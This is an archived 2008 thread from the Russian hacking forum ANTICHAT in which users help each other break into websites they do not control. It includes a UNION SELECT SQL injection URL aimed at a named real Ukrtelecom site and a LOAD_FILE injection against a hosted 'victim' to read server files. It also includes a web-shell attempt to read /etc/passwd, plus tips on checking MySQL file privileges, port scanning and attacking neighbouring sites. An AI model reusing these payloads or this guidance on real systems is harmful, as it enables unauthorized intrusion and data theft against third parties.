ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.09.2008, 08:27
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме: 1536533
Репутация:
370
|
|
geforce, скачать исходники форума, поставить патчи и попробовать разобрать сорцы. Или, как вариант, подождать новую версию и в логах посмотреть какие ошибки исправили, может что и всплывет.
Если не терпеться можешь порты просканить и узнать, что на них висит - вдруг бажное попадется или "соседний" сайт попытаться ломануть.
Дюша и Devoldini, это так будет
cmd -> cd с:\perl\bin\; perl.exe 1.pl
Хотя у меня когда Винда стояла, хватало команды perl 1.pl и всё запускалось (:
|
|
|

20.09.2008, 11:30
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Так что с этим ничего нельзя сделать ?
http://support.kharkiv.ukrtelecom.ua/news/?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null--
|
|
|

20.09.2008, 13:41
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
почитай http://www.xakep.ru/magazine/xA/086/060/1.asp
|
|
|

20.09.2008, 14:18
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме: 355954
Репутация:
32
|
|
Сообщение от iddqd
почитай http://www.xakep.ru/magazine/xA/086/060/1.asp
Ничего полезного там нет 
|
|
|

21.09.2008, 10:58
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме: 861008
Репутация:
58
|
|
почему шелл при попытке открыть etc/passwd или прочитать другой каталог выше самого сайты выдает ошибку HTTP Ошибка 406 - Не приемлемо
safe_mode 0, open_basedir no value
|
|
|

21.09.2008, 13:21
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 3
Провел на форуме: 5201
Репутация:
0
|
|
LOAD_FILE на Masterhost
Жертва находится на Masterhost.
1) нашёл инъекцию, пытаюсь прочитать файл, например так:
http://SITE_NAME.com/cgi-bin/library/com/perl/controller.cgi?action=get&uid='+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,LOAD_FILE('/home/u53608/SITE_NAME.com/www/english/index.html'),30,'31
Запрос срабатывает, но содержимое файла index.html не показывается. Можно ли узнать, есть ли у пользователя MySQL права на чтение и создание файлов? Или я просто неверно указываю путь к файлу.
2) может быть кто уже знает, есть ли у пользователя MySQL права на чтение и создание файлов?
|
|
|

21.09.2008, 13:28
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме: 4192567
Репутация:
2145
|
|
1)Попробуй перевести запрос в Char()
2)Не всегда
|
|
|

21.09.2008, 13:50
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
saynt2day
select file_priv from mysql.user where username='user'
где user - имя пользователя от которого работает мускуль
узнать через функцию user()
|
|
|

21.09.2008, 14:56
|
|
Постоянный
Регистрация: 04.11.2007
Сообщений: 331
Провел на форуме: 1724067
Репутация:
806
|
|
Уже запарился пользоваться поиском - нифига не выводит по теме.
Где-то была темка в которой выкладывали список часто-юзаемых имен таблиц и столбцов для брутфорса. Подскажите ее, плиз?
|
|
|

21.09.2008, 15:47
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме: 2634544
Репутация:
1559
|
|
Сообщение от presidentua
Уже запарился пользоваться поиском - нифига не выводит по теме.
Где-то была темка в которой выкладывали список часто-юзаемых имен таблиц и столбцов для брутфорса. Подскажите ее, плиз?
_https://forum.antichat.ru/thread45790.html
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|